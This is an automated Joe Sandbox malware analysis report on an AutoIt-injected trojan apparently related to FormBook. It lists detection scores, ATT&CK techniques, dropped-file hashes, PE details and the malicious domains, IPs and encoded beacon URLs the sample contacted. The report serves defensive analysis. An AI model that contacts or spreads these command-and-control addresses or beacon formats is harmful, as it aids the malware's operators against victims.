Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
5by4QM3v89.exe	64%	Virustotal		Browse
5by4QM3v89.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject
5by4QM3v89.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk	0%	Avira URL Cloud	safe
http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm	0%	Avira URL Cloud	safe
http://www.elinor.club/izuw/	0%	Avira URL Cloud	safe
http://www.happytrail.life/kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk	0%	Avira URL Cloud	safe
http://www.hirmic4820voe.shop/3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q==	0%	Avira URL Cloud	safe
http://www.athanasopoulos.xyz/c3ib/	0%	Avira URL Cloud	safe
http://www.spinpinang01.click/01kd/	0%	Avira URL Cloud	safe
http://www.happytrail.life/kbdb/	0%	Avira URL Cloud	safe
http://www.athanasopoulos.xyz/c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk	0%	Avira URL Cloud	safe
http://www.athanasopoulos.xyz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
hirmic4820voe.shop	162.0.215.91	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.elinor.club	194.58.112.174	true	true	unknown
www.happytrail.life	199.192.23.123	true	true	unknown
athanasopoulos.xyz	84.32.84.32	true	true	unknown
spinpinang01.click	66.29.146.78	true	true	unknown
www.spinpinang01.click	unknown	unknown	false	unknown
www.athanasopoulos.xyz	unknown	unknown	true	unknown
www.hirmic4820voe.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.athanasopoulos.xyz/c3ib/	true	Avira URL Cloud: safe	unknown
http://www.athanasopoulos.xyz/c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk	true	Avira URL Cloud: safe	unknown
http://www.spinpinang01.click/01kd/	true	Avira URL Cloud: safe	unknown
http://www.happytrail.life/kbdb/	true	Avira URL Cloud: safe	unknown
http://www.happytrail.life/kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk	true	Avira URL Cloud: safe	unknown
http://www.hirmic4820voe.shop/3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q==	true	Avira URL Cloud: safe	unknown
http://www.elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk	true	Avira URL Cloud: safe	unknown
http://www.elinor.club/izuw/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.athanasopoulos.xyz	rVnDkmUdXXPrwb.exe, 00000008.00000002.2623602119.00000000008AF000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	control.exe, 00000005.00000002.2628309209.00000000053E4000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.000000000589A000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002F9A000.00000004.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000399E4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm	control.exe, 00000005.00000002.2628309209.0000000005576000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002C76000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.192.23.123	www.happytrail.life	United States	22612	NAMECHEAP-NETUS	true
162.0.215.91	hirmic4820voe.shop	Canada	35893	ACPCA	true
84.32.84.32	athanasopoulos.xyz	Lithuania	33922	NTT-LT-ASLT	true
194.58.112.174	www.elinor.club	Russian Federation	197695	AS-REGRU	true
66.29.146.78	spinpinang01.click	United States	19538	ADVANTAGECOMUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588594
Start date and time:	2025-01-11 02:51:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5by4QM3v89.exe renamed because original name is a hash value
Original Sample Name:	959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 86% Number of executed functions: 51 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
20:54:03	API Interceptor	768772x Sleep call for process: control.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.192.23.123	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	www.learnnow.info/d5up/
	1k24tbb-00241346.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.learnnow.info/6npp/
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.learnnow.info/d5up/
	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.learnnow.info/6npp/
162.0.215.91	https://kitchenmagics.site/click/	Get hash	malicious	Unknown	Browse
84.32.84.32	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	www.sido247.pro/073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY=
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.appsolucao.shop/qt4m/
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.absseguridad.online/3io6/
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	www.absseguridad.online/vekd/
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	www.promocao.info/zaz4/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.nosolofichas.online/hqr6/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.nosolofichas.online/hqr6/
	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.promocao.info/zaz4/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.promocao.info/iiuy/
	profroma invoice.exe	Get hash	malicious	FormBook	Browse	www.techmiseajour.net/jytl/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.elinor.club	SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	72STaC6BmljfbIQ.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Pre Alert PO TVKJEANSA00967.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.58.112.174
s-part-0017.t-0009.t-msedge.net	uEuTtkxAqq.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	23754232101540928500.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	13.107.246.45
	CGk5FtIq0N.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	wOBmA8bj8d.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	kQibsaGS2E.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	1907125702104121563.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	2937924646314313784.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	RdichqztBg.exe	Get hash	malicious	FormBook	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ACPCA	gKvjKMCUfq.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3D	Get hash	malicious	Unknown	Browse	162.0.217.138
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	armv4l.elf	Get hash	malicious	Unknown	Browse	162.48.74.191
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	162.9.114.234
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	162.33.209.59
	5.elf	Get hash	malicious	Unknown	Browse	162.56.1.17
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	162.1.10.7
	arm5.elf	Get hash	malicious	Mirai	Browse	162.32.170.30
	armv7l.elf	Get hash	malicious	Unknown	Browse	162.49.35.179
NTT-LT-ASLT	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	armv5l.elf	Get hash	malicious	Unknown	Browse	84.32.26.92
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	84.32.84.152
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
NAMECHEAP-NETUS	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	63.250.43.134
	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	198.54.116.108
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	63.250.43.134
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	63.250.43.134
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	199.193.6.134
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	1162-201.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	https://delivery-pack.com/checkout/?add-to-cart=12	Get hash	malicious	Unknown	Browse	63.250.43.146
	https://clinicasanclemente.com/ap/	Get hash	malicious	HTMLPhisher	Browse	68.65.120.84
AS-REGRU	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.58.112.174
	Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	Full_Ver_Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	194.58.59.91
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	hax.ppc.elf	Get hash	malicious	Mirai	Browse	194.58.94.235
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	31.31.198.145
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	194.87.189.43

Process:	C:\Users\user\Desktop\5by4QM3v89.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.9949662871504446
Encrypted:	true
SSDEEP:	6144:iwYMwnHe0YDWXzVZCB0/W8dJyYuNdD+fdBQuFwmipQ:iGwHe0tCB0xpuNAfsujiq
MD5:	3B79CEB8836834B777B03C3D9A7372E4
SHA1:	AE4B5B5BFE4BFD5E7B3FEBCF12C7F1EC9DDB29B7
SHA-256:	C3F7D17AF504631CE92C60022E2E3A94050CCD531507922CCDEC810A6AAFB510
SHA-512:	8CA88BCA69E35A06CADAD29246E70772B904335D7522B157D01C4BB79359DB0773E09DBF0AA237426B4A41675A15B1AF4277589405C097BF8E12E017F9F091B8
Malicious:	false
Reputation:	low
Preview:	u..O1MZ8IKTG..1C.FS8JD6V.1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8K.O2MT'.ET.O...8....,_%bA'Y(J+oQ,4V"?t%#.C6Wf:Vj.y.b\:R.FKE.MZ8MKTG?28..&4.w$Q..Q2.U..uR."..{&T.Y...#..+R=./_.FO2MZ8MK..F3}B8F@>=.6VB1U6O8.FM3F[3MK.CF31C9FS8J.%VB1E6O8;BO2M.8M[TGF11C?FS8JD6VD1U6O8KFOBIZ8OKTGF31A9..8JT6VR1U6O(KF_2MZ8MKDGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1{B*@?FO2..<MKDGF3eG9FC8JD6VB1U6O8KFO.MZXMKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF3

C:\Users\user\AppData\Local\Temp\j29251pK6

Download File

Process:	C:\Windows\SysWOW64\control.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nondefinition

Download File

Process:	C:\Users\user\Desktop\5by4QM3v89.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.9949662871504446
Encrypted:	true
SSDEEP:	6144:iwYMwnHe0YDWXzVZCB0/W8dJyYuNdD+fdBQuFwmipQ:iGwHe0tCB0xpuNAfsujiq
MD5:	3B79CEB8836834B777B03C3D9A7372E4
SHA1:	AE4B5B5BFE4BFD5E7B3FEBCF12C7F1EC9DDB29B7
SHA-256:	C3F7D17AF504631CE92C60022E2E3A94050CCD531507922CCDEC810A6AAFB510
SHA-512:	8CA88BCA69E35A06CADAD29246E70772B904335D7522B157D01C4BB79359DB0773E09DBF0AA237426B4A41675A15B1AF4277589405C097BF8E12E017F9F091B8
Malicious:	false
Preview:	u..O1MZ8IKTG..1C.FS8JD6V.1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8K.O2MT'.ET.O...8....,_%bA'Y(J+oQ,4V"?t%#.C6Wf:Vj.y.b\:R.FKE.MZ8MKTG?28..&4.w$Q..Q2.U..uR."..{&T.Y...#..+R=./_.FO2MZ8MK..F3}B8F@>=.6VB1U6O8.FM3F[3MK.CF31C9FS8J.%VB1E6O8;BO2M.8M[TGF11C?FS8JD6VD1U6O8KFOBIZ8OKTGF31A9..8JT6VR1U6O(KF_2MZ8MKDGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1{B*@?FO2..<MKDGF3eG9FC8JD6VB1U6O8KFO.MZXMKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.207410680292423
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5by4QM3v89.exe
File size:	1'225'728 bytes
MD5:	6c05e87405d63cb15d69816adabe9910
SHA1:	c99d0840f3a45216f78c126aa9f2338903759d15
SHA256:	959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f
SHA512:	b5c62f9edcb0d58ac111d8cb261a009f6ab5e07c5b1048e3989e3258fc0da88e46a9516d3cbcc9c62188b01f7d926d937a3b7a26ecc278a0e862e1ad432a0e10
SSDEEP:	24576:8u6J33O0c+JY5UZ+XC0kGso6FaIOZNux7a7CrCAWY:mu0c++OCvkGs9FaIWW8Y
TLSH:	DC45CE22B3DDC361CB669173BF6AB7016EBF7C214630B85B2F880D7DA950162162D763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6751918D [Thu Dec 5 11:42:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F36F4EED83Ah
jmp 00007F36F4EE0604h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F36F4EE078Ah
cmp edi, eax
jc 00007F36F4EE0AEEh
bt dword ptr [004C31FCh], 01h
jnc 00007F36F4EE0789h
rep movsb
jmp 00007F36F4EE0A9Ch
cmp ecx, 00000080h
jc 00007F36F4EE0954h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F36F4EE0790h
bt dword ptr [004BE324h], 01h
jc 00007F36F4EE0C60h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F36F4EE092Dh
test edi, 00000003h
jne 00007F36F4EE093Eh
test esi, 00000003h
jne 00007F36F4EE091Dh
bt edi, 02h
jnc 00007F36F4EE078Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F36F4EE0793h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F36F4EE07E5h
bt esi, 03h
jnc 00007F36F4EE0838h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x62a38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12a000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
